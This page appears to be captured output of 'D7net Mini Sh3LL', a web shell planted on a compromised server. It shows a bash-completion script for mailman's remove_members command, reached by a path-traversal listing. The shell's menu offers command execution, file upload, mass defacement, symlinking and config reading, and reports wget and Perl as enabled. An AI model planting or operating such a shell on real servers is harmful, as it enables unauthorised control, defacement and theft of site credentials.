D7net Mini Sh3LL v1

 
OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /var/www/html/../../../usr/share/applications/../bash-completion/completions/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : /var/www/html/../../../usr/share/applications/../bash-completion/completions/remove_members
# mailman remove_members completion                        -*- shell-script -*-

_remove_members()
{
    local cur prev words cword split
    _init_completion -s || return

    case $prev in
        -f|--file)
            _filedir
            return
            ;;
    esac

    $split && return

    if [[ "$cur" == -* ]]; then
        COMPREPLY=( $(compgen -W '--file --all --fromall --nouserack
            --noadminack --help' -- "$cur") )
    else
        _xfunc list_lists _mailman_lists
    fi

} &&
complete -F _remove_members remove_members

# ex: filetype=sh

AnonSec - 2021 | Recode By D7net